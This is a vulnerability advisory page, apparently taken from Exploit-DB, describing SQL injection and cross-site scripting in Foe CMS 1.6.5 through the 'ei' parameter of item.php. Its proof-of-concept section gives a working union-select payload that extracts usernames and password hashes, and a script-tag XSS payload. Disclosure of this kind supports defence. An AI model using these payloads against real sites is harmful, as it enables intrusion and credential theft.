Foe CMS 1.6.5 SQL Injection Vulnerability

vendor:

Foe CMS

by:

flux77

8,8

CVSS

HIGH

SQL Injection | Cross Site Scripting

89, 79

CWE

Product Name: Foe CMS

Affected Version From: 1.6.5

Affected Version To: 1.6.5

Patch Exists: NO

Related CWE: N/A

CPE: a:foecms:foecms:1.6.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows

2020

Foe CMS 1.6.5 SQL Injection Vulnerability

SQL Injection vulnerability exists in Foe CMS 1.6.5 which allows an attacker to inject malicious SQL queries via the 'ei' parameter. Cross Site Scripting vulnerability exists in Foe CMS 1.6.5 which allows an attacker to inject malicious JavaScript code via the 'ei' parameter.

Mitigation:

Input validation should be done to prevent SQL Injection and Cross Site Scripting attacks. Sanitize user input and escape special characters.

Source

Exploit-DB raw data:

Title: Foe CMS 1.6.5 SQL Injection Vulnerability 
Vendor: http://foecms.com/
Download: http://code.google.com/p/foecms/downloads/list
Versions: 1.6.5
Platform: linux, windows
Bug: SQL Injection | Cross Site Scripting



-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits


===========
1) Introduction
===========

Gestor de categorias (Como phpbb3)
Pasar a php orientado a objetos
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto
Permisos segun rangos para TODO
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)


======
2) Bug
======

SQL Injection
http://victim/[path]/item.php?ei=[SQLi]

Cross Site Scripting
http://victim/[path]/item.php?ei=[XSS]


=====
3)proof of concept
=====

Example SQLi
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--

Example XSS
http://victim/[path]/item.php?ei=<script>alert(1)</script>


=====
4)Credits
=====

flux77
Contact : 0xflux77 at gmail.com